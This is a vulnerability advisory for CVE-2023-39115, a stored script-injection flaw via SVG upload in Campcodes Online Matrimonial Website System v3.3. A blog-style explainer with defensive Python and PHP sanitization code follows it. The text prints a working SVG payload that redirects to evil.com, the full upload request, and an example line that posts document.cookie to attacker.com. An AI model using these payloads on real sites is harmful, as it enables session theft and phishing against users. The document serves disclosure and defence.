Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload
# Date: 3-8-2023
# Category: Web Application
# Exploit Author: Rajdip Dey Sarkar
# Version: 3.3
# Tested on: Windows/Kali
# CVE: CVE-2023-39115
Description:
----------------
An arbitrary file upload vulnerability in Campcodes Online Matrimonial
Website System Script v3.3 allows attackers to execute arbitrary code via
uploading a crafted SVG file.
SVG Payload
------------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")
window.location.href="https://evil.com"
</script>
</svg>
Steps to reproduce
--------------------------
-Login with your creds
-Navigate to this directory - /profile-settings
-Click on Gallery -> Add New Image -> Browser -> Add Files
-Choose the SVG file and upload done
-Click the image!! Payload Triggered
Burp Request
-------------------
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="relativePath"
null
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="name"
file (1).svg
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="type"
image/svg+xml
-----------------------------167707198418121100152548123485
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")
window.location.href="https://evil.com"
</script>
</svg>
-----------------------------167707198418121100152548123485--

Campcodes Online Matrimonial Website System v3.3: Critical Code Execution Vulnerability via Malicious SVG Upload
On March 8, 2023, cybersecurity researcher Rajdip Dey Sarkar disclosed a critical vulnerability in the Campcodes Online Matrimonial Website System v3.3, designated as CVE-2023-39115. This flaw enables remote code execution through the upload of a crafted SVG (Scalable Vector Graphics) file, exposing users and administrators to severe security risks. The vulnerability arises from improper file validation and execution of embedded scripts within SVG files, which can be exploited to perform malicious actions such as redirecting users to phishing sites, stealing session cookies, or even initiating server-side attacks.
Understanding the Vulnerability: How SVG Files Become a Threat
SVG files are designed for vector-based graphics and are widely used on web platforms. However, they support embedded <script> tags, which can execute JavaScript code when rendered in a browser. While this feature is intended for interactive graphics, it becomes a security hazard when improperly handled by web applications.
In Campcodes v3.3, the system allows users to upload profile images via the /profile-settings section. The upload endpoint — /Matrimonial%20Script/install/aiz-uploader/upload — accepts files with Content-Type: image/svg+xml, but fails to sanitize or disable script execution within the uploaded file. This oversight creates a direct pathway for attackers to inject malicious JavaScript.
Exploit Payload: Malicious SVG File Example
The <script> element embedded in the SVG shown in the advisory above carries the following JavaScript:
```javascript
alert("You have been hacked!!")
window.location.href="https://evil.com"
```
This payload is a simple yet effective example of how malicious code can be embedded in an SVG file. When uploaded and viewed by a user, the browser interprets and executes the JavaScript code:
- Alert message: Triggers a pop-up warning to confirm the exploit’s success.
- Redirect to evil.com: Redirects the victim’s browser to a malicious site, potentially leading to phishing or malware delivery.
Although this example uses benign actions, real-world attackers could replace these with more destructive payloads — such as fetch('https://attacker.com/steal-cookie', { method: 'POST', body: document.cookie }) — to exfiltrate sensitive data.
Attack Vector: Step-by-Step Reproduction
Attackers can exploit this vulnerability through the following steps:
- Log in to the Campcodes system using valid credentials.
- Navigate to /profile-settings → Gallery → Add New Image.
- Select the malicious SVG file via the file browser.
- Upload the file with Content-Type: image/svg+xml.
- Once the image is displayed, clicking or viewing it triggers the embedded script.
Notably, this attack does not require server-side execution; it is purely client-side. However, if the application allows SVG files to be stored and served directly (without sanitization), the payload can persist and be executed every time the image is accessed.
HTTP Request Analysis: Burp Suite Capture
Using Burp Suite, the request to the upload endpoint reveals the vulnerability’s technical signature:
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485
Content-Length: 1044
Origin: http://localhost
Connection: close
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
The request includes:
- name="aiz_file" with filename file (1).svg
- type="image/svg+xml", explicitly indicating the file type
- Raw SVG content, including <script> tags
Despite CSRF tokens and authentication checks, the system fails to validate the file’s content, allowing malicious scripts to pass through unchecked.
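The content validation that the captured request shows the application skipping, as an added example in Python (not code from the Campcodes project, the advisory, or any library): the upload handler receives the client's filename, declared Content-Type and file bytes, and accepts the file only when the extension is allowlisted, the declared type matches that extension, the bytes are not markup, and the magic bytes match the format. It also picks a server-side storage name and the response headers for serving stored files. The sample inputs are constructed, the first one from the values in the request above; names such as validate_upload and ALLOWED_FORMATS are this example's own.

```python
import secrets

# Allowlist of raster formats the gallery may accept. Each entry maps the
# file extension to the MIME type it must be declared as and a magic-byte
# check on the actual content. SVG is deliberately absent.
ALLOWED_FORMATS = {
    "png": ("image/png", lambda b: b.startswith(b"\x89PNG\r\n\x1a\n")),
    "jpg": ("image/jpeg", lambda b: b.startswith(b"\xff\xd8\xff")),
    "jpeg": ("image/jpeg", lambda b: b.startswith(b"\xff\xd8\xff")),
    "gif": ("image/gif", lambda b: b[:6] in (b"GIF87a", b"GIF89a")),
}


def looks_like_markup(data: bytes) -> bool:
    """True when the content starts with '<' after an optional BOM and whitespace.
    An SVG renamed to .png or sent with a forged Content-Type still fails this."""
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")
    return head.startswith(b"<")


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason). Nothing the client sends is trusted on its own:
    the extension, the declared type and the bytes must all agree."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_FORMATS:
        return False, f"extension '.{ext}' is not allowlisted"
    expected_type, magic_ok = ALLOWED_FORMATS[ext]
    # Content-Type may carry parameters ("; charset=..."); compare only the media type.
    media_type = declared_type.split(";", 1)[0].strip().lower()
    if media_type != expected_type:
        return False, f"declared type '{media_type}' does not match .{ext}"
    if looks_like_markup(data):
        return False, "content is XML/HTML markup, not a raster image"
    if not magic_ok(data):
        return False, f"magic bytes do not match {expected_type}"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen file name: the client's name and relativePath are never reused."""
    return f"{secrets.token_hex(16)}.{ext}"


def download_headers(media_type: str) -> dict:
    """Headers for serving stored user files so that even a file that slipped
    through cannot run script in the site's origin or be sniffed as HTML."""
    return {
        "Content-Type": media_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed samples: the first mirrors the filename, declared type and
# leading bytes of the captured request; the others are variations on it.
SVG_UPLOAD = ("file (1).svg", "image/svg+xml", b'<?xml version="1.0" standalone="no"?>\n<svg/>')
RENAMED_SVG = ("avatar.png", "image/png", b'<svg xmlns="http://www.w3.org/2000/svg"/>')
REAL_PNG = ("avatar.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
MISMATCHED = ("avatar.png", "image/svg+xml", REAL_PNG[2])

if __name__ == "__main__":
    for sample in (SVG_UPLOAD, RENAMED_SVG, REAL_PNG, MISMATCHED):
        print(sample[0], sample[1], validate_upload(*sample))
```

The order of the checks matters: the extension allowlist rejects the advisory's upload outright, the markup check catches an SVG that has merely been renamed, and the magic-byte check is what finally ties the declared type to the bytes. The storage name and headers cover the remaining exposure, since a file that is stored under the client's name and served inline from the application's origin is exactly what lets the stored script run with the victim's session.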
Security Implications and Risk Assessment
This vulnerability poses significant risks, especially in user-facing web applications:
| Risk Category | Impact |
|---|---|
| Client-Side Script Injection | Users can be redirected to phishing sites or infected with malware. |
| Session Hijacking | Attackers can steal cookies via JavaScript to impersonate users. |
| Phishing & Social Engineering | Malicious alerts and redirects create trust-based attacks. |
| Reputation Damage | Compromised platforms can lose user trust and face legal consequences. |
Even if the application doesn’t execute server-side code, the client-side exploit can still lead to data breaches, especially if users are unaware of the threat.
Recommended Mitigation Strategies
To prevent such vulnerabilities, developers must implement robust file upload validation and sanitization. Here are key best practices:
- File Type Validation: Use MIME type checks and file extension filtering, but do not rely solely on Content-Type.
- SVG Sanitization: Strip all <script>, <iframe>, <object>, and other executable elements from SVG files before storage.
- Use a Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and external sources.
- Server-Side Rendering: Convert uploaded SVG files to static images (e.g., PNG) before serving to users.
- File Upload Restrictions: Limit file types to safe formats (e.g., JPEG, PNG) and disable SVG uploads unless absolutely necessary.
Improved Code Example: Sanitized SVG Processing
```php
<?php
// Example of SVG sanitization in PHP using regular expressions.
// Regex stripping is a minimal defence: it does not cover event-handler
// attributes (onload, onclick, ...) or foreignObject, and can be bypassed by
// encoding tricks. Prefer parsing the SVG into a DOM and allowlisting elements
// and attributes, or reject SVG uploads entirely.
function sanitize_svg($svg_content) {
    // Remove all script tags together with their contents
    $svg_content = preg_replace('/<script\b[^>]*>.*?<\/script>/is', '', $svg_content);
    // Remove iframe, object, embed, and other dangerous elements
    $svg_content = preg_replace('/<iframe\b[^>]*>.*?<\/iframe>/is', '', $svg_content);
    $svg_content = preg_replace('/<object\b[^>]*>.*?<\/object>/is', '', $svg_content);
    $svg_content = preg_replace('/<embed\b[^>]*>/is', '', $svg_content);
    // Ensure no external URLs in href or src: only fragment references ("#id") are kept
    // (the original listing is cut off at this point; this filter is an assumed completion)
    $svg_content = preg_replace('/\s(href|src|xlink:href)\s*=\s*(["\'])(?!#)[^"\']*\2/i', '', $svg_content);
    return $svg_content;
}
```
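The same sanitization done by parsing rather than pattern matching, as an added example in Python (not the blog's PHP, the Campcodes project's code, or a library API): the SVG is parsed with the standard library's ElementTree, script-bearing elements are dropped with their subtrees, event-handler attributes are removed, and href/xlink:href values that are not fragment references are stripped, which handles javascript:, data: and external URLs with one rule. It runs against the advisory's payload (a constructed copy with the DOCTYPE on one line) and against a second constructed SVG that mixes a legitimate fragment reference with an external image. The names sanitize_svg, FORBIDDEN_ELEMENTS and the report dictionary are this example's own; xml.etree is not hardened against entity-expansion attacks, so untrusted input should go through defusedxml or a maintained sanitizer with an element allowlist.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Keep the default and xlink prefixes stable when re-serialising.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed foreign content; removed with their subtree.
FORBIDDEN_ELEMENTS = {"script", "handler", "foreignObject", "iframe", "object", "embed"}
# Attributes that may carry a URL; only fragment references ("#id") are kept.
URL_ATTRIBUTES = {"href", "{%s}href" % XLINK_NS}


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def _clean(element, report):
    """Recursively remove forbidden children, then filter this element's attributes."""
    for child in list(element):
        if _local(child.tag) in FORBIDDEN_ELEMENTS:
            report["elements"].append(_local(child.tag))
            element.remove(child)
        else:
            _clean(child, report)
    for name in list(element.attrib):
        local = _local(name)
        value = element.attrib[name].strip()
        if local.lower().startswith("on"):  # onload, onclick, onbegin, ...
            report["attributes"].append(local)
            del element.attrib[name]
        elif name in URL_ATTRIBUTES and not value.startswith("#"):
            report["attributes"].append(f"{local}={value}")
            del element.attrib[name]


def sanitize_svg(svg_bytes: bytes):
    """Parse, clean and re-serialise an SVG. Returns (cleaned_bytes, report).
    xml.etree does not fetch the external DTD named in the DOCTYPE, but it is
    not hardened against entity expansion: use defusedxml for untrusted input."""
    root = ET.fromstring(svg_bytes)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    report = {"elements": [], "attributes": []}
    _clean(root, report)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True), report


# Constructed sample: the advisory's payload with the DOCTYPE on one line.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("You have been hacked!!")
window.location.href="https://evil.com"
</script>
</svg>
"""

# Constructed sample: a benign fragment reference that must survive and an
# external image reference that must not.
MIXED_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<defs><circle id="dot" r="5"/></defs>
<use xlink:href="#dot" x="10" y="10"/>
<image xlink:href="https://cdn.example.test/logo.png" width="50" height="50"/>
</svg>"""

if __name__ == "__main__":
    for sample in (MALICIOUS_SVG, MIXED_SVG):
        cleaned, report = sanitize_svg(sample)
        print(report)
        print(cleaned.decode())
```

Because the document is re-serialised from the parsed tree, nothing the parser did not understand survives, which is what the regex version cannot guarantee: a `<script` split by comments, entities or unusual whitespace is still one script element to the parser. The report lets the upload handler log what was removed and, for a gallery that should never contain script at all, reject the file instead of storing the cleaned copy.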